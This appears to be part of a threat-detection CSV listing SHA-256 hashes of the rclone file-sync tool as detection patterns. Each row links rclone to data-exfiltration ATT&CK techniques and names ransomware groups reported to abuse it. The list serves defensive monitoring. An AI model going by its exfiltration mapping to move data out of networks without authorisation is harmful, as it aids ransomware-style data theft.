"*f0433048a374b655d98396d4cf60f28a9286962d40ba03c791d64d6608911210*",".{0,1000}f0433048a374b655d98396d4cf60f28a9286962d40ba03c791d64d6608911210.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f06b4c511c466dc0bc6ce1897b42551565965f7964ca33acd19829e0c271f6a7*",".{0,1000}f06b4c511c466dc0bc6ce1897b42551565965f7964ca33acd19829e0c271f6a7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f0955bc39c7983518875318d843859180f5cd47922a62852d75746dacada84b9*",".{0,1000}f0955bc39c7983518875318d843859180f5cd47922a62852d75746dacada84b9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f0cb2b2a4eeef825671b32a3ad2c1f0f01daa3a8f301b35d6a068ce7ddb351ec*",".{0,1000}f0cb2b2a4eeef825671b32a3ad2c1f0f01daa3a8f301b35d6a068ce7ddb351ec.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f0df0ff18deffb04707e1f14bf546d18cdad566798fdae16329dc320113f6a0f*",".{0,1000}f0df0ff18deffb04707e1f14bf546d18cdad566798fdae16329dc320113f6a0f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f12d47279fdb2f896b6f0f315734ffd2d8b1d3db79cf377c55c772a9cc158177*",".{0,1000}f12d47279fdb2f896b6f0f315734ffd2d8b1d3db79cf377c55c772a9cc158177.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f138639350d3735df86d6628a223f31111772a8a3e4d5648ddbd5d2af52a19c9*",".{0,1000}f138639350d3735df86d6628a223f31111772a8a3e4d5648ddbd5d2af52a19c9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f13912099e2f929c310e70ea6079b5cd7f1956b39408e975efe698d500cb4ef8*",".{0,1000}f13912099e2f929c310e70ea6079b5cd7f1956b39408e975efe698d500cb4ef8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f1519ce7537ded97e28b44ef9f612bef963161887dd010fc4e73271e4a9a8fad*",".{0,1000}f1519ce7537ded97e28b44ef9f612bef963161887dd010fc4e73271e4a9a8fad.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f185996846f3e71d20cb79336e76f73d2b2fb7250fea1e9b98f77547fdd3bd06*",".{0,1000}f185996846f3e71d20cb79336e76f73d2b2fb7250fea1e9b98f77547fdd3bd06.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f2c9afa59d436b3f4bb9b9f63eaeebc4cd42c4013a8282a9a016b5d946eacd86*",".{0,1000}f2c9afa59d436b3f4bb9b9f63eaeebc4cd42c4013a8282a9a016b5d946eacd86.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f2f60fc62c1507491273e15d901ebec40a1c45423308074adc5fdb0ef4494724*",".{0,1000}f2f60fc62c1507491273e15d901ebec40a1c45423308074adc5fdb0ef4494724.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f30186ec0fef95b090c2771c3ccd2c2ea2c825e7e84219ec3d9c35fa0a513e4d*",".{0,1000}f30186ec0fef95b090c2771c3ccd2c2ea2c825e7e84219ec3d9c35fa0a513e4d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f3224bea461878342b1b6556e181dfe2010520f543d4059258e9ea9833f3b84f*",".{0,1000}f3224bea461878342b1b6556e181dfe2010520f543d4059258e9ea9833f3b84f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f33781a369e97243d817cf060cb90accaa821a0c5b07c8bfd519977169d7607f*",".{0,1000}f33781a369e97243d817cf060cb90accaa821a0c5b07c8bfd519977169d7607f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f3863ef3fcbcc0aa0ca00c6bf1c099be9470df360751912db5c9021d3e549d10*",".{0,1000}f3863ef3fcbcc0aa0ca00c6bf1c099be9470df360751912db5c9021d3e549d10.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f3d5d5dfe286aab5d5c0a7911ddc14ef414c26869f47197a8a3a15b4e6e716ad*",".{0,1000}f3d5d5dfe286aab5d5c0a7911ddc14ef414c26869f47197a8a3a15b4e6e716ad.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f3e721ec6af65f742acb17dee34eb3685a83880269eb6552351427346b4027f9*",".{0,1000}f3e721ec6af65f742acb17dee34eb3685a83880269eb6552351427346b4027f9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f453fb377dc017d4c2a83a223cf61ede4953bf89d6296fd245908a9957972dcb*",".{0,1000}f453fb377dc017d4c2a83a223cf61ede4953bf89d6296fd245908a9957972dcb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f465bc43be0dc450fe44f103d45ca3720918aec4925440eea06e7607c1937f24*",".{0,1000}f465bc43be0dc450fe44f103d45ca3720918aec4925440eea06e7607c1937f24.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f491b3d7eb2aff7cf06a5bd139c21a12896274ddbc44ff3a4559fcb145509b2d*",".{0,1000}f491b3d7eb2aff7cf06a5bd139c21a12896274ddbc44ff3a4559fcb145509b2d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f49cb11065c2dec1020f64d0399e65f03b75ae1cea405bfaff4ae7d045d60bdb*",".{0,1000}f49cb11065c2dec1020f64d0399e65f03b75ae1cea405bfaff4ae7d045d60bdb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f4b8d0559597ff7ae16378dc947c137a855d7198fb2357f19d2fe78c1fc7eb03*",".{0,1000}f4b8d0559597ff7ae16378dc947c137a855d7198fb2357f19d2fe78c1fc7eb03.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f50558fb674a98d8604fde66d6a8103e533dc480efa6b12234ed4e5ce76adaf5*",".{0,1000}f50558fb674a98d8604fde66d6a8103e533dc480efa6b12234ed4e5ce76adaf5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f532a0fdd90fd1747a13717096109301033812119f9c17415ac4ac531804a021*",".{0,1000}f532a0fdd90fd1747a13717096109301033812119f9c17415ac4ac531804a021.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f539a912a343577e71d35d86545f573acf3050ab197de9d73bb789ca7634aeee*",".{0,1000}f539a912a343577e71d35d86545f573acf3050ab197de9d73bb789ca7634aeee.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f5bb1c3947c4cdf7ed4e4afd4f0a8eeffbc522cde8af5ed15a979b3f58ea2446*",".{0,1000}f5bb1c3947c4cdf7ed4e4afd4f0a8eeffbc522cde8af5ed15a979b3f58ea2446.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f634ab00dba3e7f2b6928ca0a689800856cd93c325d64610bcbcb31f4f8579ac*",".{0,1000}f634ab00dba3e7f2b6928ca0a689800856cd93c325d64610bcbcb31f4f8579ac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f651da5ff95943ad8da00b2d48b88c607c1df47f2ba80b68e7dc76a9537c2e5d*",".{0,1000}f651da5ff95943ad8da00b2d48b88c607c1df47f2ba80b68e7dc76a9537c2e5d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f6698805a88849bb42be528ad3ac4bbae0841172c67ec49e041b421ddf5261fc*",".{0,1000}f6698805a88849bb42be528ad3ac4bbae0841172c67ec49e041b421ddf5261fc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f6d1b2d7477475ce681bdce8cb56f7870f174cb6b2a9ac5d7b3764296ea4a113*",".{0,1000}f6d1b2d7477475ce681bdce8cb56f7870f174cb6b2a9ac5d7b3764296ea4a113.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f6eec625f705a1e3715769770854ee3a7a746daf7c74f642fca3e5ac56cad624*",".{0,1000}f6eec625f705a1e3715769770854ee3a7a746daf7c74f642fca3e5ac56cad624.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f72512b574d5155acb3a654dabc9344738151586950367fb1153e8f0ba699d6f*",".{0,1000}f72512b574d5155acb3a654dabc9344738151586950367fb1153e8f0ba699d6f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f73c23848da2b41e6fc17bb89bddfe8910a61356ab677f8abc2c77bce44960bb*",".{0,1000}f73c23848da2b41e6fc17bb89bddfe8910a61356ab677f8abc2c77bce44960bb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f77af8dc5c2df9249cf89a4feaa8ac210051c22ec74e0eb89a947c049b53c494*",".{0,1000}f77af8dc5c2df9249cf89a4feaa8ac210051c22ec74e0eb89a947c049b53c494.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*f79ba243876f4949ebc917025c9c97c71297aefb3fb0ebad1aa1d0a9b1f54e58*",".{0,1000}f79ba243876f4949ebc917025c9c97c71297aefb3fb0ebad1aa1d0a9b1f54e58.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
